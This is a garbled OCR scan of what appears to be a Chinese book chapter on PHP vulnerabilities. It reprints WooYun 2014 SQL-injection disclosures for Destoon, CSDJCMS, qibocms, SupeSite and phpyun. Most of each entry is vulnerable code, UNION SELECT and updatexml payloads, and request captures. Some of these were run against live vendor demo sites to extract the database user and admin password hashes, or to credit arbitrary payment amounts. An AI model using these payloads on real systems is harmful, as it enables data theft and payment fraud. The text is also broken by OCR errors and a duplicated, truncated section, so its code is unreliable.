// 注 意 交易 单 不 要 重复 处 理 

// 注 意 判断 返回 金额 

$total_fee = ($total_fee+$discount )/100; 

$r = $db->get_one("SELECT * FROM ($DT PREjfinance « 
[age M 
然后 带 入 查询 。 





Hey i] LE 8H 


INT y| = $ SQL” XSS- Encryption" Encoding Other- 
4} Load URL  |http://127.0.0.1/destoon/api/pay/paypal/notify.php 





» Execute 


[W] Enable Post data [FE] Enable Referrer 
Post data item number-a' UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11# 


WWW.Wooyutr. org 


看 看 所 执行 的 语句 。 


< & DB deskoon 
2 y SELECT username,passport,company,truename,password,gxoupid,email,message,chat,sound,gnline,sms,credit, money, 4egáaiR, ae 
28 :ry REPLACE INTO destoon online [S8SXASLSARILANRIAE MOda SAA ORLAR 人 VALUES ('i','admin','127.0.0.1','1',' ”13S 











ty SELECT * FROM destoon finance charge WHERE itemid-'a' UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11#' AND status=0 LIMIT C 
6 Query UPDATE destoon finance charge SET status-1l,receiyetime-'1396163606',editor-' — — Cep SAW OPRAH. etg 


论 PHP 常见 漏洞 


WooYun-2014-55026 : Destoon Sql 注入 漏洞 2 (有 条 件 ) 189 


WooYun-2014-52363 : CSDJCMS 程 式 舞曲 最 新 版 
Sql 一 枚 


漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-052363 


简要 描述 

看 到 官网 上 又 更 新 了 2014-2-25 加 强 了 SQL 安全 注入 。 特 别 感 谢 白 帽子 : C 

€ » ^ C4nfang ^ Jimdxds ^ d SE 09€ - ^ Ixj616 ) 对 程序 的 漏洞 检测 。 还 感谢 了 
各 和 白 帽子 啊 还 不 错 。 


那 就 继续 挖 挖 ? 


详细 说 明 
在 user\pay.php 中 


public function tenpay return url() { 
require once (CSCMSPATH."tenpay/ResponseHandler.class.php". 
$resHandler - new ResponseHandler(); 
$resHandler-»setKey($key); 
// 判 断 签 名 
if($resHandler->isTenpaySign()) { 
/ / iÉ 4eid 
$notify id = $resHandler-»getParameter("notify id"); 
// 商 户 订单 号 
$out_trade_no = $resHandler->getParameter("out_ trade n« 
// 财 付 通 订单 号 
$transaction_id = $resHandler->getParameter("transactic 


// 如 果 有 使 用 折扣 券 ，discount 有 值 ， total feetdiscount= 原 请 求 1 


$discount = $resHandler->getParameter ("discount"); 

// 支 付 结果 

$trade_state = $resHandler->getParameter("trade_state" 

// ARH, LBP HT BI UK 

$trade_mode = $resHandler->getParameter("trade_mode"); 

if("1" == $trade_mode ) { 

if( "0" == $trade state)( 

$row=$this->db->query("select CS R! 
if(! $row) { 


$this->CsdjSkins->Msg_url( 


} 
$this->CsdjSkins->Msg_url('#HB& > ; 
} else { 
// 当 做 不 成 功 处 理 
echo "<br/>" . "即时 到 帐 支付 失败 " . "<br/>"; 
} 
}elseif( "2" == $trade mode ) ( 
if( "0" == $trade state) ( 
echo "<br/>" . "中 介 担 保 支付 成 功 " . "<br/>"; 
} else { 
echo "<br/>" . "中 介 担 保 支付 失败 " . "<br/>"; 
} 
} 
} else { 
echo "<br/>" . "认证 签名 失败 " . "<br/>"; 


echo $resHandler->getDebugInfo() . "<br>"; 














getParameter 就 相当 request 把 ? 


这 里 是 没有 过 滤 的 。 但 是 有 点 验证 。 


function isTenpaySign() { 
$signPars = ""; 
ksort($this-»parameters); 


foreach($this->parameters as $k => $v) { 


if("sign" I= $k && "" 1= $v) { 
$signPars .= $k . "=". $v . "&"; 
j 
j 
$signPars .= "key=" . $this->getKey(); 


$sign = strtolower(md5($signPars)); 
$tenpaySign = strtolower($this->getParameter("sign")); 


//debug/s & 


$this-» setDebugInfo($signPars . " => sign:" . $sign . 
" tenpaySign:" . $this-»getParameter("sign")); 
return $sign == $tenpaySign; 


相等 即 可 。 
Come and Sql it. 


Hey i] HE BH 





it PHP 常见 漏洞 





—— ——————" 
4m) Load URL  |http://demo.chshcms.com/index.php/user/pay/tenpay. return url 
Q Split URL 
») Execute 





[V] Enable Post data [F] Enable Referrer 
Post data kign=ef873d26c42fe91ad75f74e86d1a3ca5&out_trade_no=aaaaaaaaa’ union select user()#&trade_mode=1&trade_state=0 

















Filename: tenpay/ResponseHandler. class. php 


Line Number: 52 


FARSI, MTA linux@localhost 7p. BWM AR REARS 


AR 请 牢记 您 的 定单 号 aaaaaaaaa union select user ()#! 


返回 继续 操作 O 





返回 首页 
www.wodyun.org 


官网 测试 成 功 。 

还 可 以 充值 任意 金额 。 
5 oD @ 

修复 方案 


Check it. 
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WooYun-2014-80873 : qibocms 地 方 门户 系统 注 
入 #3 (demo 1X) 


< 
漏洞 作者 I ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-080873 


简要 描述 

Fighting 

详细 说 明 

在 /hy/memberhomepage ctrl.php 中 


if($atn&&eregi("^([ a-z0-9]-)$",$atn)&&is file(dirname( FILE ).", 
require_once(dirname(__FILE__)."/homepage_ctrl/$atn.php"); 
j 
加 
包含 文件 进来 


hy\member\homepage_ctrl\pic_edit.php 中 





if(count($pids)<1) showerr(" 至 少 选择 一 项 " ) ; 

$pids-implode(",",$pids); 

$query=$db->query("SELECT * FROM {$ prejpic WHERE pid IN($pids) ORI 

while($rs=$db->fetch_array($query) ){ 
$rs[posttime]-date("Y-m-d H:i:s",$rs[posttime]); 
//$rs[ur1]-$webdb[www ur1]."/".$user picdir.S$rs[url]; 
$rs[url]-tempdir($rs[ur1]); 


$listdb[]=$rs; 





$pids-implode(",",$pids); 这 里 成 字符 串 后 然后 就 直接 带 入 到 了 查询 当中 
且 无 单 引 号 。 
所 以 可 以 直接 注入 了 。 


注册 个 会 员 


hy/member/homepage_ctrl.php?atn=pic_edit&pids[]=1) union select 
1,2,3,4,user(),6,7,8,9,10,11,12%23 


— c owns es 





© Load URL | 127.0.0. 1/den/gibod£/hy/menber/honepage ctrl.php?atn-pic edit&pids[]-1) union select 1,2,3, 4, user (), 6, T, 8, 9, 10, 11, 12823 


U Split URL 


) 
» Execute 





C Enable Post data Enable Referrer 











^ 


您 的 公司 资料 尚未 完善 ， 建 议 您 继续 完善 您 的 公司 资料 。 
提醒 :公司 资料 越 完 善 ， 客 户 对 您 的 信任 度 越 高 。 


商铺 设置 








公司 资料 | 公司 介绍 | 联系 方式 | 模板 设置 | MEK | 公司 图 库 | 新 闻 管 理 | 发 布 新 闻 || SEO 设置 


批量 修改 图 片 入 
Hak: rootülocalhost he (最 多 16 个 字 ) 


排序 : [11 











测试 一 下 demo: 


论 PHP 常见 汤 





洞 





inl | @ @ SuLr >>” Encryptiony Encodingy Uther” 
r=) Load URL http: //life5. gibosoft. com//hy/member/homepage_ctrl. php?atn=pic_edit&pids[]=aaX23 
Q split uL 





>?) Execute 











据 库 连 接 出 错 :SELECT * FROM lifeS_hy_pic WHERE pid IN(aa#) ORDER BY orderlist DESC 





ou have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '" 
064 


at line 1 
[商铺 预览 ] 


构造 一 下 


INT VS @ SQLr XSS- Encryption" Encodingy Üther- 


w Load URL 
split URL 





http: //life5. gibosoft. com//hy/member/homepage ctrl. php?atn-pic edit&pids[]-1) union select 1,2, 3, 4, user (), 6, 7, 8, 8, 10, 11, 12323 


>) Execute 








[C] Enable Post data [| Enable Referrer 
[商铺 预览] 





商铺 设置 


HERBS 





E: v7 lifeGlocalhost| (最 多 16 个 字 ) 














Dal 











漏洞 证 明 


INT Y| œ $9 SUL  XSS- Encryption: Encoding: Other” 
de) Load URL 
split URL 





http: //life5. gibosoft. com//hy/member/homepage ctrl. php?atn=pic_edit&pids[]=1) union select 1,2, 3, 4, user (), 5, 7, 8, 8, 10, 11, 12323 





>) Execute 


[C] Enable Post data [| Enable Referrer 





[商铺 预览 ] 





商铺 设置 


diti ET EE 














(最 多 16 个 字 ) 








A o ade 
修复 方案 


intval 
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WooYun-2014-79045 : Supesite 3j & i£ A #3 
(Delete) 


z 
漏洞 作者 : ' 雨 。 V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-079045 

简要 描述 

Delete 如 果 Ucenter 和 supesite 在 一 个 裤 的 话 可 以 尝试 把 uckey 注 入 出 来 然后 ..………. 
详细 说 明 

在 cp.php 中 


$ac = empty($_GET['ac']) ? 'profile' : trim($ GET['ac']); 


if(in_array($ac, array('index', 'news', 'profile', 'credit', 'mode. 


include once(S ROOT.'./source/cp '.$ac.'.php'); 





包含 进来 
在 source/cp_news.php 中 
if(empty($itemid)) { // 这 里 让 $itemid 不 为 空 
if(!empty($ SCONFIG['posttime']) && $ SGLOBAL['group']['gr« 
if($ SGLOBAL['timestamp'] - $_SGLOBAL['member']['lastpc 


showmessage('post too much'); 


} 
$newsarr['uid'] = $ SGLOBAL['supe uid']; 
$newsarr['username'] = $ SGLOBAL['supe username' ]; 


$newsarr['dateline'] = $ SGLOBAL['timestamp']; 


if($ POST['fromtype'] == 'newspost') ( 
$newsarr['fromtype'] - 'newspost'; 
$newsarr['fromid'] = intval($ POST['id']); 

) else { 
$newsarr['fromtype'] - 'userpost'; 

j 

if(!checkperm('allowdirectpost')) { 
$itemarr['itemid'] = inserttable('spaceitems', $newsari 
inserttable('spacenews', $itemarr); 
getreward('postinfo'); 
postspacetag('add', $ POST['type'], $itemarr['itemid'], 
$do - 'pass'; 

} else { 
$itemarr['itemid'] = inserttable('postitems', $newsarr, 
inserttable('postmessages', $itemarr); 
postspacetag('add', $ POST['type'], $itemarr['itemid'], 
$do - 'me'; 

j 

// 更 新 用 户 最 新 更 新 时 间 

if($_SGLOBAL['supe_uid']) { 
updatetable('members', array('updatetime'=>$ SGLOBAL[ '1 

j 

} else { //3t Xelse 
if(empty($ SGLOBAL['supe uid'])) showmessage('no permissior 
updatetable('postitems', $newsarr, array('itemid'-»$itemid: 


updatetable('postmessages', $itemarr, array('itemid'=>$iter 


$itemid = empty($ POST['oitemid']) ? $itemid : $ POST[ 'oite 


postspacetag('update', $ POST['type'], $itemid, $tagarr, O0: 








function postspacetag($op, $type, $itemid, $tagarr, $status) { 
global $ SGLOBAL; 
$deletetagidarr = $addtagidarr = $spacetagidarr = array(); 
if($op == 'add') { // 已 经 存在 的 tag, 执行 加 入 操作 
if(!empty($tagarr['existsid'])) { 
$addtagidarr = $tagarr['existsid']; 
$_SGLOBAL[ 'db']->query('UPDATE '.tname('tags').' SET sil 
j 
) else { 
$query = $ SGLOBAL['db']-»query('SELECT * FROM '.tname( ' sp: 
while ($spacetag = $ SGLOBAL['db']-»fetch array($query)) { 
if(!empty($tagarr['existsid']) && in array($spacetag['! 
$spacetagidarr[] = $spacetag['tagid']; 
) else { 


$deletetagidarr[] = $spacetag['tagid'];//J&4& 


j 

foreach ($tagarr['existsid'] as $etagid) ( 
if(!empty($spacetagidarr) && in array($etagid, $spaceté 
) else { 


$addtagidarr[] = $etagid; 


j 
if(!empty($deletetagidarr)) { 
//% € €$deletetagidarr/ 7 # 
那么 也 就 是 要 让 
$query = $ SGLOBAL['db']->query('SELECT * FROM '.tname('spacetags' 


$_SGLOBAL[ 'db']->query('DELETE FROM '.tname('spacetags 


$_SGLOBAL[ 'db']->query('UPDATE '.tname('tags').' SET 


€ 








| http: //127. D. 0. 1/dan/supesite/cp. php?ac-news&op-add&type-news&31T281| 


b Execute 


[C] Enable Post data [ | Enable Referrer 


Cirt 口 全 屏 清除 格式 | 恢复 内 容 | RTT RR ShitEnter BE) 





获取 远程 资讯 : 


智能 获取 3|| 6B2312 V| [RRR 








投稿 这 里 tag 随便 写 一 个 
+-------- +------- +------------ +------ +-------- + 
| itemid | tagid | dateline | type | status | 


T-------- T------- T------------ T------ T-------- 十 


| 3 | 1 | 1412680532 | news | 0 | 

| 4 | 2 | 1412680930 | news | 0 | 

数据 库 里 也 就 创建 了 。。 

这 里 的 itemid #.../dan/supesite/cp.php?ac=news&op=view&itemid=4 
地 址 中 就 能 看 到 为 4 


然后 在 $query = $_SGLOBAL['db']->query(SELECT * FROM '.tname('spacetags").' 
WHERE itemid=\".$itemid.'\’ AND status=\".$status.'\"); 


这 里 查询 
mysql> SELECT x FROM supe spacetags WHERE itemid=’4’ AND status=’®@’ ; 


一 


! itemid | 


row in set (6.68 


mysql> SELECT * FROM supe spacetags WHERE itemid=’ 4xxxxxxxxxxxxx and select’ AND 
status=’@’ ; 





row in 
这 里 查询 后 面 虽然 跟 了 一 些 字符 提示 warning 但 是 还 是 能 查询 出 来 。 


$ SGLOBAL['db']->query('DELETE FROM '.tname(‘spacetags').' WHERE 
itemid='.$itemid.' AND tagid IN (‘.simplode($deletetagidarr).') AND 
status=\".$status.'\"); 


然后 就 进来 delete 里 面 没 单 引号 且 无 intval 导致 注入 。 
投稿 的 时 候 抓 包 一 下 


cn8 guest mobile-; cn8 guest qq-7; cn8 guest company-asdi; cn9_gu 


SupeSite info: MySQL Query Error cn8 username-xiaoyu; l15I msid-ABwP4P; 
CHZZDATASO862620=cnzz eid$3D813951151-14121595T4-326ntime*3D1412 





User: xiaoyuasd 
Time: 2014-10-7 7:25pm Send POST Content ? 


Script: /dan/supesite/cp.php &Xx8f 908" Qrin 






SQL: DELETE FROM [Table ]spacetags WHERE itemid=4a AND tagid IN ('2') AND status- 'D' 
Error: Unknown column '4a' in "where clause' 
Errno.: 1054 


Content-Disposition: form-data; name=“itemid”irin 














Content-Disposition: form-data; name-"oitemid" \r\n 
irin 

4a\r\n 

Sa 2931495037448--\rin 





Content-Length: 1564 





& PHP 常见 漏洞 





LJ Snable rost data | | Lnable Nererrer Cookie: supeSpacelordFunc-; cn9_guest_truename=xiaoyu; cn8 guest email-xiaoyuliqqa 
wm cn9 guest mobile-; cn8 guest qq-; cn8 guest company-asdi; cn9 guest telephone-123 
SupeSite info: MySQL Query Error cn9 username-xiaoyu; l5I msid-ASwP4P; 


CNZZDATASO862620=cnzz eidX3D813951151-1412189574-326ntimeW3D1412169574: 








User: xiaoyuasd 


Time: 2014-10-7 7:26pm [V] Send POST Content ? 
Script: /dan/supesite/cp.php 


















2931495037448 br in 
Content-Disposition: form-data; name=“itemid“\rin 
Arin 

1irkn 


SQL: DELETE FROM [Table ]spacetags WHERE itemid-4 and 1= (updatexmi(1, concat(Oxpe2. 
Error: XPATH syntax error: '*$root@localhost~$' 
Errno.: 1105 





Content-Disposition: form-data; name= "itenid" Arin 
Arin 


4 and 1= (updatexml (1, concat (0x5e24, (select user ()), Ox5e24), 1))#\rin 
2931495037448--\r\n 





Content-Length: 1625 


Ca] 





漏洞 证明 





LJ Snable rost data | | Enable Kererrer Cookie: supeSpaceWordFunc-; cn8 guest truename-xiaoyu; cn8 guest email-xiaoyuliqqa 
i" cn8 guest mobile-; cn8 guest qq-; cn8 guest company-asdi; cn9 guest telephone-123 
SupeSite info: MySQL Query Error cn9 username-xiaoyu; l5I msid-ASwP4P; 


CNZZDATASO862620=cnzz eidX3D813951151-1412189574-326ntimeW3D1412169574: 








User: xiaoyuasd 


Time: 2014-10-7 7:26pm [v] Senà POST Content ? 
Script: /dan/supesite/cp.php 

















SQL: DELETE FROM [Table ]spacetags WHERE itemid-4 and 1= (updatexmi(1, concat(Oxpe2. 
Error: XPATH syntax error: '*$root@localhost~$' 
Errno.: 1105 


Content-Disposition: form-data; name=“itemid“\rin 
Arin 
1irkn 





Content-Disposition: form-data; name=“oitemid”\rin 
Arin 


4 and 1=(updatexml (1, concat (0x5e24, (select user ()), Ox5e24), 1) )#\r\n 
2931495037448--\r\n 





Content-Length: 1625 





intval 或 者 单 引 号 上 把 
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WooYun-2014-88872 : phpyun v3.2 (20141226) 
两 处 注入 e 


v 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-088872 
简要 描述 
最 近 更 新 日 期 (2014-12-26) LRAT, 麻烦 别 再 给 5rank 了 20 走 起 可 好 。 一 处 是 
新 的 一 处 算是 绕 过 补丁 了 。 之 前 还 有 一 两 个 没 打 补丁 哦 加 快速 度 把 。 
详细 说 明 
第 一 处 新 发 现 的 在 兑换 奖品 的 时 候 
在 model/redeem.class.php 中 
function dh_action(){ 
$this->public_action(); 
if(!$this->uid && !$this->username) 
{ 
$this->obj->ACT_layer_msg(" 您 还 没有 登录 ， 请 先 登录 1",8,$ € 
} 
if($_POST[ 'submit']){ 
if(!$_POST[ 'password']){ 
$this-»0bj-»ACT layer msg(" Z 487558677 È ! ", 8, $ SERVER 
} 
if(!$ PosT['linkman'] || !$ POST['linktel'] ){ 


$this-»0bj-»ACT layer_msg(" 联 系 人 或 联系 电话 不 能 为 空 n, 


$info-$this-»0bj-»2DB select once("member",""^uid'-z'".$tl 


$passwrod-md5(md5($ POST['password']).S$info['salt']); 


if(S$info['password']!-$passwrod)( 


$this-»0bj-»ACT layer msg(" #4 7E ! ",8,$ SERVER[ 


j 


if(!$this->uid && !$this->username) { 


$this->obj->ACT_layer_msg(" 您 还 没有 登录 ， 请 先 登 录 1",t 


selse{ 


if ($_POST[ 'num']<1){ 


$this->obj->ACT_ layer_msg(" 请 填写 正确 的 数量 | "8,: 


jelse( 


if($ COOKIE['usertype']--z"'1")( 
$table-"member statis"; 
jelseif($ COOKIE['usertype']--z"2")( 
$table-"company. statis"; 
jelseif($ COOKIE['usertype']-z"3")( 
$table-"lt statis"; 
}elseif($_COOKIE[ 'usertype' ]=="4"){ 
$table="px_train_statis"; 
j 
$info-$this-»0bj-»2DB select once($table,"'uid'- 
$gift-$this-»20bj-»2DB select once("reward"," id. 
if($ POST['num']»$gift['stock'])( 
$this-»0bj-»ACT layer_msg(" 已 超出 库存 数量 ! "， 
selse{ 
if($gift['restriction' ]!="0"&&$_ POST[ num 


$this->obj->ACT_layer_msg(" 已 超出 限购 数量 





selse{ 


$integral-$gift['integral']*$ POST['nur 


if($info['integral']«$integral)( 


$this-»0bj-»ACT. layer_msg(" 您 的 积分 3 


selse{ 


$this->obj->company_invtal($this->t 


$value.=""uid°='".$this->uid."',"; 
$value.-"'username ='".$this->userr 
$value.=""usertype ='".$ COOKIE['u: 
$value.=" name -'".$gift['name']." 
$value.=" gid ="'".$gift['id']."',", 
$value.=" linkman -'".$ POST['linkr 
$value.=" linktel ='".$ POST['linkl 
$value.=" body ='".$ POST['body'].' 
$value.-""integral'-z'".$integral." 
$value.=" num z'".$ POST['num']."', 
$value.=" ctime -z'".time()."'"; 


$this->obj->DB_insert_once("change' 


$this->obj->DB_update_all("reward", 


$this->obj ->ACT_layer_msg( "324% RF » 











function DB_update_all($tablename, $value, $where = 1){ 


$SQL = "UPDATE `" . $this->def . $tablename . "^ SET $value 
$this->db->query("set sql_mode=''"); 
$return=$this->db->query($SQL); 


return $return; 





m —— 
查询 查询 

但 是 我 们 来 看 看 $_POST[num'] 之 前 有 啥 处 理 没 。 

可 以 看 到 前 面 有 三 个 比较 。 


if($_POST['num']<1){ // 这 里 比较 是 否 小 于 1 php 弱 语言 像 lasdxx 都 能 过 。 
$this->obj->ACT_layer_msg ("请 卉 写 正确 的 数量 1 ",8,: 
selse{ 
if ($_COOKIE[ 'usertype' ]=="1"){ 
$table="member_statis"; 
jelseif($ COOKIE['usertype']-z"2")( 
$table-"company. statis"; 
jelseif($ COOKIE['usertype']-z"3")( 
$table-"lt statis"; 
jelseif($ COOKIE['usertype']-z"4")( 
$table-"px train statis"; 
j 
$info-$this-»0bj-»2DB select once($table," uid - 
$gift=$this->obj->DB_select_once("reward"," .id 
if($_POST['num']>$gift['stock']){、// 这 里 第 二 处 比 
这 里 的 库存 为 100\. 发 现 如 果 我 传递 的 num 为 lasd 之 类 的 时 候 3tb/Rtrue f » » 那么 就 
$this->obj->ACT_layer_msg(" 已 超出 库存 数量 1"， 
jelse( 
if(S$gift['restriction']!-"o"&&$ POST['num'' 


$this-»0bj-»ACT layer_msg(" 已 超出 限购 数量 


jelse( 





论 PHP 常见 漏洞 





INT Y| = ẹ SRL? XSS- Encryption" Encodiner Other” 
4s) Load URL http: //web/web/phpyunl226/ index. php?m-2redeem&c-dh&i d=1 
Q^ split URL 





Enable Post data [ | Enable Referrer 

















Post data submi t=x&passwor d=xi aoyux#]inkman=x@linktel=xénum=1 asdasdhs 
bool (true) 

ys) Load URL http: //web/web/phpyunl226/ index. php?m-2redeem&c-dh&i d=1 

Ü spit URL 


) Execute 





Enable Post data  [ | Enable Referrer 





Post data 





submit-xé&password-xiaoyuxélinkman-xélinktel- 





&num-1tlsdasd&$afekey-el alb: 
i 








bool (false) 


那么 我 们 就 能 绕 过 这 个 判断 了 。 


LAI 大 加 最 多 | | EasyTalk Administras E 390sec 信 号 实生 小 中 QN Exploit-DBumiSIZ4U | | EasyTalk Administra" Eg] 133TDay | ;90secTools |S 
INT wc $ SQL XSS- Encryptiony Encoding: Other” 
c Load URL 

















http: //web/web/phpyunl226/ index. php/ admin/?m-redeem&c-dh&i d=1 
Ü split URL 


) Execute 





[v] Enable Post data [] Enable Referrer 
Post data 





submi t-xépassword-xiaoyu&linkman-xélinktel-x&num-itl, name= (select concat (username, 0x23, password) from 
phpyun_admin_user )hsafekey=el al b4950a49e9fe0ch3bb0e3 f600e95 











UPDATE phpyun_reward SET stock = stock -1+1,name=(select 
concat(username,0x23,password) from php_admin_user) WHERE id ='1' 


此 时 执行 的 语句 
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ib PHP 常见 漏洞 





INT v| œ $ SAL” XSSr Encryption: Encoding: Üther- 
w) Load URL http: //web/web/phpyunl226/ index. php?m-redeem&c-show&i d=1 
Ü Split URL 

>) Execute 














剩余 库存 数量 ，100 件 (已 兑换 0 fH) 
这 里 随便 说 一 下 补丁 解决 泄 汤 key 的 那个 方法 太 漆 了 把 。。 


很 轻松 的 就 绕 过 去 了 。 这 里 不 多 说 ， 简 直 。。 


第 二 处 在 apilalipay\alipayto.php 


require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config. | 
require_once(dirname(dirname(dirname(__FILE__)))."/data/db.safety. | 
require_once(dirname(dirname(dirname(__FILE__)))."/plus/config.php' 
require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.c- 
$db = new mysql($db config['dbhost'], $db config['dbuser'], $db_cor 
if(!is_numeric($_POST[ 'dingdan' ] ) ){die;} 

$ COOKIE['uid']-(int)$ COOKIE['uid']; 

$ POST['is invoice']-(int)$ POST['is invoice']; 

$ POST['balance']-(int)$ POST['balance']; 

$member sql-$db-»-query("SELECT * FROM ~".$db_config["def"]."member 
$memberzmysql fetch array($member sql); 

if($member['username'] != $_COOKIE['username'] || $member['usertyp« 


echo ' 登 录 信 息 验 证 错误 ， 请 重新 登录 1 'sdie; 
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$sql=$db->query("select * from ~".$db_config["def"]."company_order 
$row-mysql fetch array($sql); 


if('$row['uid'] || $row['uid']!-$ COOKIE['uid']) 


die; 


if((int)$ POST['is invoice']--'i1'&&$config["sy com invoice"])( 
$invoice title=", is invoice -'".$ POST['is invoice']."'"; 
if ($_POST['linkway']=='1'){ 
$com_sql=$db->query("select ‘linkman , linktel', address 1 
$company=mysql_fetch_array($com_sql); 
$link-",'".$company['linkman']."','".$company['linktel']." 
$up_record=", link man' -'".$company['linkman']."', link mol 
selse{ 
$link=",'".$ POST['link man']."','".$ POST['link moblie'].' 
$up_record=", link man' -'".$ POST['link man']."', link mob. 
} 
$record_sql=$db->query("select ` id from ~".$db_config["def"].' 
$record=mysql_fetch_array($record_sql); 
if($record['id']){ 


$upr_sql=$db->query("update "".$db config["def"]."invoice ! 


mysql fetch array(S$upr. sq1); 





可 以 看 到 data/db.safety.php 把 过 滤 文 件 添 加 进来 了 。 
那么 这 里 的 $_POST 我 们 就 不 能 引入 单 引 号 了 。 


但 是 。。 


if($_POST['linkway']=='1'){ 
$com_sql=$db->query("select ^linkman' , linktel' , address 1 
$companyzmysql fetch array($com sq1); 
$link-",'".$company['linkman']."','".$company['linktel']." 
$up_record=", link man -'".$company['linkman']."', link mol 
jelse( 
$link=",'".$ POST['link man']."','".$ POST['link_moblie'].' 


$up_record=", link man -'".$ POST['link man']."', link mob. 


BN __# 
首先 编辑 自己 的 企业 信息 把 safekey 加 进去 。 





")Live HITP Replay 











POST v| http: //web/web/phpyunl226/member/index. php/ admin/?c=infobact=save 
HTTP Headers 


Host: web ^ 

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 

Accept: text/html, application/xhtmltxml, application/xml; q=0. 9, */*; q70. 8 

Accept-Language: zh-en, zh; q70. 8, en-us; q70. 5, en; q-0. 3 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Referer: http: //web/web/phpyunl226/member/index. php?c=info 

Cookie: ECS[visit_times]=6; themeIndexTom=2; KT-GUID-KT- 

CSDDTSCS69SEA5S25535706602C6136C; KT-ADMIN-admin; 1Teplastvisit=1418373539; 

lTeplastactivity-Ü0; |^ utma=242460388. 119574638. 1418373557. 1418373557. 1418373557. 1; 
utmz-242480388. 1418373557. 1.1. utmcen= (direct) lutmesr= (direct) lutmemd= (none): M 




















Send POST Content ? 


A E EE 11538186919812*r'in ^ 
Content-Disposition: form-data; name-" address" rin 

irin 

yu union select xx from\r\n 

TD A 11538186919912\rin 

Content-Disposition: form-data; name-"safekey"Ar'in 

trin 

f213ae15d14ba9de59934fdfbe3ebTOf\r in 

EXER eR 11538186919912\rin 

Content-Disposition: form-data; name="hy“irin z 
Sein — 


Content-Length: 237T 











这 里 我 直接 把 语句 数 出 来 了 。 


论 PHP 常见 漏洞 





qu] Load URL | http: //web/web/phpyunl226/api/alipay/alipayto. php| 
Ü Split URL 
5», Execute 





[V] Enable Post data [] Enable Referrer 


Post date dingdan=1151321321514i s_invoi ce=1@1inkway=1 

















insert into phpyun invoice record (order_id, uid, ti 


ink moblie , address ) 
values(’’,’1’,’’,’ 0°,’ 1419095579", ’ c^, ' 13594589655’ 


estatus addtime; akman 
, yu union select xx from ) 


漏洞 十 明 


INT v| œ $ SQLr XSS- Encryption: Encoding: Otherr 
三 Load URL http: //web/web/phpyunl226/ index. php?m-redeem&c-show&i d=1 


Ü Split URL 





») Execute 





a 
An KIF MAA RHE RH ”企业 黄页 ”职场 资讯 ”招聘 会 ”工具 箱 


© 您 当前 的 位 置 : 首页 > 积分 商城 >admin#21232f297a57a5a743894aDe 


admin#21232f297adfada743894a0e 





所 需 积 分 ，0 积 


剩余 库存 数量 ，100 件 (BRIM o 件 ) 
修复 方案 


第 一 个 用 pylode 
第 二 个 对 出 库 的 addslashes 一 次 。 
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WooYun-2014-88872 : phpyun v3.2 (20141226) 
两 处 注入 e 


v 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-088872 
简要 描述 
最 近 更 新 日 期 (2014-12-26) LRAT, 麻烦 别 再 给 5rank 了 20 走 起 可 好 。 一 处 是 
新 的 一 处 算是 绕 过 补丁 了 。 之 前 还 有 一 两 个 没 打 补丁 哦 加 快速 度 把 。 
详细 说 明 
第 一 处 新 发 现 的 在 兑换 奖品 的 时 候 
在 model/redeem.class.php 中 
function dh_action(){ 
$this->public_action(); 
if(!$this->uid && !$this->username) 
{ 
$this->obj->ACT_layer_msg(" 您 还 没有 登录 ， 请 先 登录 1",8,$ € 
} 
if($_POST[ 'submit']){ 
if(!$_POST[ 'password']){ 
$this-»0bj-»ACT layer msg(" Z 487558677 È ! ", 8, $ SERVER 
} 
if(!$ PosT['linkman'] || !$ POST['linktel'] ){ 


$this-»0bj-»ACT layer_msg(" 联 系 人 或 联系 电话 不 能 为 空 n, 


$info-$this-»0bj-»2DB select once("member",""^uid'-z'".$tl 


$passwrod-md5(md5($ POST['password']).S$info['salt']); 


if(S$info['password']!-$passwrod)( 


$this-»0bj-»ACT layer msg(" #4 7E ! ",8,$ SERVER[ 


j 


if(!$this->uid && !$this->username) { 


$this->obj->ACT_layer_msg(" 您 还 没有 登录 ， 请 先 登 录 1",t 


selse{ 


if ($_POST[ 'num']<1){ 


$this->obj->ACT_ layer_msg(" 请 填写 正确 的 数量 | "8,: 


jelse( 


if($ COOKIE['usertype']--z"'1")( 
$table-"member statis"; 
jelseif($ COOKIE['usertype']--z"2")( 
$table-"company. statis"; 
jelseif($ COOKIE['usertype']-z"3")( 
$table-"lt statis"; 
}elseif($_COOKIE[ 'usertype' ]=="4"){ 
$table="px_train_statis"; 
j 
$info=$this->obj->DB_select_once($table, "uid ~- 
$gift=$this->obj ->DB_select_once("reward"," id 
if($ POST['num']»$gift['stock'])( 
$this-»0bj-»ACT layer msg(" ££ HE EXC 1n, 
selse{ 
if($gift['restriction' ]!="0"&&$_POST[ num 


$this->obj->ACT_layer_msg(" 已 超出 限购 数量 





selse{ 


$integral-$gift['integral']*$ POST['nur 


if($info['integral']«$integral)( 


$this-»0bj-»ACT. layer_msg(" 您 的 积分 3 


selse{ 


$this->obj->company_invtal($this->t 


$value.=""uid°='".$this->uid."',"; 
$value.-"'username ='".$this->userr 
$value.=""usertype ='".$ COOKIE['u: 
$value.=" name -'".$gift['name']." 
$value.=" gid ="'".$gift['id']."',", 
$value.=" linkman -'".$ POST['linkr 
$value.=" linktel ='".$ POST['linkl 
$value.=" body ='".$ POST['body'].' 
$value.-""integral'-z'".$integral." 
$value.=" num z'".$ POST['num']."', 
$value.=" ctime -z'".time()."'"; 


$this->obj->DB_insert_once("change' 


$this->obj->DB_update_all("reward", 


$this->obj ->ACT_layer_msg( "324% RF » 











function DB_update_all($tablename, $value, $where = 1){ 


$SQL = "UPDATE `" . $this->def . $tablename . "^ SET $value 
$this->db->query("set sql_mode=''"); 
$return=$this->db->query($SQL); 


return $return; 





m —— 
查询 查询 

但 是 我 们 来 看 看 $_POST[num'] 之 前 有 啥 处 理 没 。 

可 以 看 到 前 面 有 三 个 比较 。 


